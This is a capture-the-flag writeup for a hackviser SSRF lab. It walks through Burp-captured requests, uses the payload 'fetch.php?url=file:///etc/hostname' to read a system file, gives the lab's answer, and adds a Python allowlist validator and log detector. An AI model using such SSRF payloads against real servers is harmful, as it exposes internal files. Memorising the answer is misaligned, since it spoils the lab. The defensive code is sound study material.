Basic SSRF Lab


  • The background needed to solve this challenge was covered in my previous writeup (Exam Server-Side Request Forgery (SSRF)).

This lab contains a Server-Side Request Forgery (SSRF) vulnerability in a PHP-based web application. To complete the lab, exploit the SSRF vulnerability in the URL parameter to obtain the server’s hostname information. What is the server’s hostname?

  • First I opened Burp Suite and visited the site. As in the previous exercise, there is one initial request, followed by a second request to the server asking it to fetch an image for the page:
GET / HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: keep-alive
  • The image-fetching request
GET /fetch.php?url=http://localhost/images/01.jpg HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://picked-captain.europe1.hackviser.space/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Priority: u=5
Te: trailers
Connection: keep-alive
  • I used the payload /fetch.php?url=file:///etc/hostname to make the server read the contents of the file /etc/hostname and send it back to me.
POST /fetch.php?url=file:///etc/hostname HTTP/1.1
Host: picked-captain.europe1.hackviser.space
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/plain,image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://picked-captain.europe1.hackviser.space/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Priority: u=5
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
  • Since this is a basic lab, there is no blacklist or any other filtering on the server side. The response came back as follows:
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 01 Oct 2025 19:16:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 8
Connection: keep-alive
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff

reducto

==> The answer is: reducto
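The root cause above is that fetch.php forwards whatever scheme and host the url parameter carries, so file:// reads the local filesystem. The following is an added example (not part of the original writeup or the lab code) of the allowlist check a fixed fetch.php would apply, plus a small detector that runs the same check over access-log request lines; the image host name and the log lines are constructed for the example.

```python
from urllib.parse import urlparse, parse_qs, unquote
import posixpath

# Constructed allowlist: the one origin and path prefix fetch.php is meant to proxy.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.internal"}   # hypothetical image host
ALLOWED_PATH_PREFIX = "/images/"

def validate_fetch_url(url):
    """Allowlist check for the url parameter: returns (ok, reason)."""
    try:
        p = urlparse(url)
        port = p.port            # raises ValueError on a malformed port
    except ValueError:
        return False, "unparseable url"
    if p.scheme.lower() not in ALLOWED_SCHEMES:
        # file://, gopher://, dict:// and a missing scheme all stop here
        return False, "scheme not allowed: %s" % (p.scheme or "(none)")
    if p.username is not None or p.password is not None:
        return False, "userinfo not allowed"
    host = (p.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        # localhost, literal IPs and any unlisted host are rejected, not blacklisted
        return False, "host not allowed: %s" % (host or "(none)")
    if port not in (None, 80, 443):
        return False, "port not allowed"
    path = posixpath.normpath(unquote(p.path or "/"))   # collapses ../ after decoding
    if not path.startswith(ALLOWED_PATH_PREFIX):
        return False, "path outside image directory"
    return True, "ok"

# Constructed request lines, in the shape they appear in an access log.
SAMPLE_LOG = """GET /fetch.php?url=http://images.example.internal/images/01.jpg HTTP/1.1
GET /fetch.php?url=file:///etc/hostname HTTP/1.1
GET /fetch.php?url=http://localhost/images/01.jpg HTTP/1.1
GET /index.php HTTP/1.1"""

def flag_ssrf_attempts(log_text):
    """Return (request_line, reason) for each fetch.php call whose url fails the check."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ")
        if len(parts) < 2 or not parts[1].startswith("/fetch.php?"):
            continue
        query = parse_qs(parts[1].split("?", 1)[1])
        for url in query.get("url", []):
            ok, reason = validate_fetch_url(url)
            if not ok:
                hits.append((line, reason))
    return hits
```

Note that the lab's own http://localhost/images/01.jpg fetch is flagged too: a fixed application should read local images from disk directly rather than proxying a URL to itself.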


Author: Kai0Kid

Publish Date: 10 - 02 - 2025

License: Unlicensed
